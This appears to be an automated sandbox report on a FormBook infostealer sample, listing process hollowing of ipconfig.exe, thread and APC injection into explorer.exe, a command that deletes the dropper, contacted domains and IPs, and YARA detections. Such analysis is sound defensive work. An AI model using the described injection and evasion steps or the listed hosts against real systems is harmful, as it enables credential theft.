          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C02397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C92073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BF746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C88DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C02990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C13D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C53540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BF4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BF7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C5A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F14BB SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F14EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F14BB SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F14EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.dawonderer.com
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.147 80
          Source: C:\Windows\explorer.exeDomain query: www.bolacorner.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.71.57.184 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 160000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeMemory written: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeThread register set: target process: 3968
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3968
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeProcess created: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe"
          Source: explorer.exe, 00000006.00000000.297613941.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.405442294.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.341373691.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000006.00000000.333653859.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.298182545.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.350435148.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.298182545.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.341667901.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.405844896.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.298182545.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.341667901.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.405844896.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.405534885.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.297624532.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.341397222.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000006.00000000.298182545.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.341667901.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.405844896.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001EFE73 cpuid
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F0FE8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
